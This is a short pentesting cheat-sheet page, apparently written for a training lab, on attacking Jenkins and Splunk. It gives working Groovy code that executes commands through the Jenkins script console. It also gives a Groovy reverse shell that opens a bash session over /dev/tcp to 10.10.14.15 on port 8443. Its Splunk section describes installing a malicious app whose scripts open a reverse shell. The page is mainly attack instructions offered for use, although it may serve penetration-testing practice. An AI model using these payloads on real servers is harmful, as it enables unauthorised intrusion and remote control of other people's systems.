Application Attacks

Various Application Attacks

This page covers attacks on applications such as:

  1. Jenkins

  2. Splunk

Jenkins

After getting access to the console page, we can get RCE via http://jenkins.inlanefreight.local:8000/script and write Groovy code

Linux RCE

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

Linux Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows RCE

Windows Reverse Shell

Splunk

Reverse Shell using Splunk: https://github.com/0xjpuff/reverse_shell_splunk

This allows us to create an application which runs our commands on the server, and does the reverse connection

inputs.conf

run.bat

rev.py

Create the Splunk application

Start a reverse shell on our machine and upload the file via Install app from file in the Splunk UI

Last updated